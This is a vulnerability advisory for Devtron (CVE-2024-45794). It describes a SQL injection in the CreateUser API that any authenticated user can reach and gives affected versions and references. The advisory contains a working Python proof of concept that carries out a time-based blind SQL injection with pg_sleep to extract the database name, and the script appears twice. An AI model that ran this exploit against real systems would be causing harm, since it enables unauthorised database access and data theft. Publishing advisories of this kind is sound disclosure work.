ghsa-q78v-cv36-8fxj
Vulnerability from github
Published
2024-11-07 17:14
Modified
2024-11-07 19:29
Severity ?
8.3 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
8.7 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N
Summary
Devtron has SQL Injection in CreateUser API
Details

Summary

An authenticated user (with minimum permission) could utilize and exploit SQL Injection to allow the execution of malicious SQL queries via CreateUser API (/orchestrator/user).

Details

The API is CreateUser (/orchestrator/user).

The function to read user input is: https://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/api/auth/user/UserRestHandler.go#L96-L104

The userInfo (line 104) parameter can be controlled by users.

The SQL injection can happen in the code: https://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/pkg/auth/user/repository/UserAuthRepository.go#L1038

The query (line 1038) parameter can be controlled by a user to create and execute a malicious SQL query.

The user should be authenticated but only needs minimum permissions: image

PoC

Demonstrate a blind SQL injection to retrieve the database name:

``` import requests import time import string import argparse

def blind(ip, token, query): url = f"http://{ip}/orchestrator/user" headers = {"token": token} entity = "chart-group" payload = f"'; {query} --"

data = {"id": 111, "email_id": "abcd123@126.com", "superAdmin": False, "roleFilters":[{"team":"", "environment":"", "action": "", "entity": entity, "accessType": payload}]} #"EntityName": "test", "AccessType": "test", "Cluster": "",\"NameSpace": "devtroncd", "Group": "", "Kind": "", "Resource": "", "Workflow": ""
start = time.time()
res = requests.post(url, headers=headers, json = data)
end = time.time()
#print(res.content)
if(end - start > 1):
    return True
return False

def main(ip, token): chs = string.printable result = "" is_end = False i = 1 while(not is_end): is_end = True for ch in chs: if(blind(ip, token, f"select case when substring(datname,{i},1)='{ch}' then pg_sleep(1) else pg_sleep(0) end from pg_database limit 1;")): print(ch) result += ch is_end = False break i += 1 print(result)

if name == "main": argparser = argparse.ArgumentParser() argparser.add_argument("--ip", "-i", type=str, help="Target IP") argparser.add_argument("--token", "-t", type=str, help="API TOKEN") args = argparser.parse_args() main(args.ip, args.token) ```

The debugging breakpoint indicated that the malicious SQL query was executed: image

We can see that we can get the database name: image

Impact

SQL injection vulnerability. Our tests indicate that the latest version is affected.

The reporters are Yuan Luo, Shuai Xiong from Tencent YunDing Security Lab.

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/devtron-labs/devtron"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.7.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-45794"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-11-07T17:14:04Z",
    "nvd_published_at": "2024-11-07T18:15:17Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nAn authenticated user (with minimum permission) could utilize and exploit SQL Injection to allow the execution of malicious SQL queries via CreateUser API (/orchestrator/user).\n\n### Details\nThe API is CreateUser (/orchestrator/user).\n\nThe function to read user input is:\nhttps://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/api/auth/user/UserRestHandler.go#L96-L104\n\nThe userInfo (line 104) parameter can be controlled by users.\n\nThe SQL injection can happen in the code:\nhttps://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/pkg/auth/user/repository/UserAuthRepository.go#L1038\n\nThe query (line 1038) parameter can be controlled by a user to create and execute a malicious SQL query.\n\nThe user should be authenticated but only needs minimum permissions:\n![image](https://github.com/user-attachments/assets/08ba940e-33a8-408d-9a1e-9cd1504b95c5)\n\n\n### PoC\n\nDemonstrate a blind SQL injection to retrieve the database name:\n\n```\nimport requests\nimport time\nimport string\nimport argparse\n\ndef blind(ip, token, query):\n    url = f\"http://{ip}/orchestrator/user\"\n    headers = {\"token\": token}\n    entity = \"chart-group\"\n    payload = f\"\u0027; {query} --\"\n\n    data = {\"id\": 111, \"email_id\": \"abcd123@126.com\", \"superAdmin\": False, \"roleFilters\":[{\"team\":\"\", \"environment\":\"\", \"action\": \"\", \"entity\": entity, \"accessType\": payload}]} #\"EntityName\": \"test\", \"AccessType\": \"test\", \"Cluster\": \"\",\\\"NameSpace\": \"devtroncd\", \"Group\": \"\", \"Kind\": \"\", \"Resource\": \"\", \"Workflow\": \"\"\n    start = time.time()\n    res = requests.post(url, headers=headers, json = data)\n    end = time.time()\n    #print(res.content)\n    if(end - start \u003e 1):\n        return True\n    return False\n\ndef main(ip, token):\n    chs = string.printable\n    result = \"\"\n    is_end = False\n    i = 1\n    while(not is_end):\n        is_end = True\n        for ch in chs:\n            if(blind(ip, token, f\"select case when substring(datname,{i},1)=\u0027{ch}\u0027 then pg_sleep(1) else pg_sleep(0) end from pg_database limit 1;\")):\n                print(ch)\n                result += ch\n                is_end = False\n                break\n        i += 1\n    print(result)\n\nif __name__ == \"__main__\":\n    argparser = argparse.ArgumentParser()\n    argparser.add_argument(\"--ip\", \"-i\", type=str, help=\"Target IP\")\n    argparser.add_argument(\"--token\", \"-t\", type=str, help=\"API TOKEN\")\n    args = argparser.parse_args()\n    main(args.ip, args.token)\n```\n\nThe debugging breakpoint indicated that the malicious SQL query was executed:\n![image](https://github.com/user-attachments/assets/c9067360-8fb3-4d64-82e9-3af1e5e60969)\n\nWe can see that we can get the database name:\n![image](https://github.com/user-attachments/assets/29d5d969-876a-452d-be7f-8984d2a28c25)\n\n\n### Impact\nSQL injection vulnerability. Our tests indicate that the latest version is affected.\n\nThe reporters are Yuan Luo, Shuai Xiong from Tencent YunDing Security Lab.\n",
  "id": "GHSA-q78v-cv36-8fxj",
  "modified": "2024-11-07T19:29:30Z",
  "published": "2024-11-07T17:14:04Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/devtron-labs/devtron/security/advisories/GHSA-q78v-cv36-8fxj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45794"
    },
    {
      "type": "WEB",
      "url": "https://github.com/devtron-labs/devtron/commit/1540271bd777b6bccd288e513a9070d8f04b6056"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/devtron-labs/devtron"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Devtron has SQL Injection in CreateUser API"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.